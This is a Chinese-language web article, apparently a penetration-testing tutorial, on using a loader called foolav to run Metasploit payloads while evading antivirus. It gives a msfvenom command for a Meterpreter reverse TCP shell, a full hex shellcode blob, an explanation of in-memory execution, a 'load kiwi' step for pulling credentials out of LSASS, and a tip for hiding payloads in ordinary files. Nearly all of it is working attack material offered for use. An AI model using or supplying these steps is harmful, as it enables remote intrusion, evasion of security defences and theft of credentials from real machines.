注册
登录
在渗透测试中, 当你需要执行如meterpreter等的payload,而又需要做免杀时,下面这段代码编译的exe也许会对你产生帮助。你需要做的就是上传这两个文件,同目录下的可执行exe文件和payload文件。 实验指南1.准备好你的payload(32位系统): calc(计算器实验版本):
meterpreter(实战反弹shell版本): msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -ax86 -f c 2>/dev/null | egrep "^\"" | tr -d"\"\n;" >foolav.mf 2.payload文件(与exe文件重名,但后缀为mf),拷贝到与exe文件同目录,然后可以通过下面的方式启动calc.exe。 mf文件内容如下: \xbb\x28\x30\x85\x5b\xd9\xf7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x5a\x0e\x03\x72\x3e\x67\xae\x7e\xd6\xee\x51\x7e\x27\x91\xd8\x9b\x16\x83\xbf\xe8\x0b\x13\xcb\xbc\xa7\xd8\x99\x54\x33\xac\x35\x5b\xf4\x1b\x60\x52\x05\xaa\xac\x38\xc5\xac\x50\x42\x1a\x0f\x68\x8d\x6f\x4e\xad\xf3\x80\x02\x66\x78\x32\xb3\x03\x3c\x8f\xb2\xc3\x4b\xaf\xcc\x66\x8b\x44\x67\x68\xdb\xf5\xfc\x22\xc3\x7e\x5a\x93\xf2\x53\xb8\xef\xbd\xd8\x0b\x9b\x3c\x09\x42\x64\x0f\x75\x09\x5b\xa0\x78\x53\x9b\x06\x63\x26\xd7\x75\x1e\x31\x2c\x04\xc4\xb4\xb1\xae\x8f\x6f\x12\x4f\x43\xe9\xd1\x43\x28\x7d\xbd\x47\xaf\x52\xb5\x73\x24\x55\x1a\xf2\x7e\x72\xbe\x5f\x24\x1b\xe7\x05\x8b\x24\xf7\xe1\x74\x81\x73\x03\x60\xb3\xd9\x49\x77\x31\x64\x34\x77\x49\x67\x16\x10\x78\xec\xf9\x67\x85\x27\xbe\x88\x67\xe2\xca\x20\x3e\x67\x77\x2d\xc1\x5d\xbb\x48\x42\x54\x43\xaf\x5a\x1d\x46\xeb\xdc\xcd\x3a\x64\x89\xf1\xe9\x85\x98\x91\x6c\x16\x40\x78\x0b\x9e\xe3\x84 3.如下图,一旦运行了可执行exe文件(foolav.exe),这里附上 下载地址 。payload文件(foolav.mf)就会被解析,导入单独线程,在内存中执行相应的功能:
提示x86文件在x86和x86_64windows系统都可以运行,你可以使用x86下的payload。然而,x86的meterpreter是可以迁移到x86_64进程的。此后你如果运行: load kiwi 它会加载x86_64版本,保证可以从 内存里 访问 LSASS进程中的敏感内容:
.mf文件自然是被加密混淆的,解析器会忽略除了16进制(\xHH)的其他字符。这意味着它可以把你的payload加入几乎任何文件,甚至加入你自己的评论里:
|
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
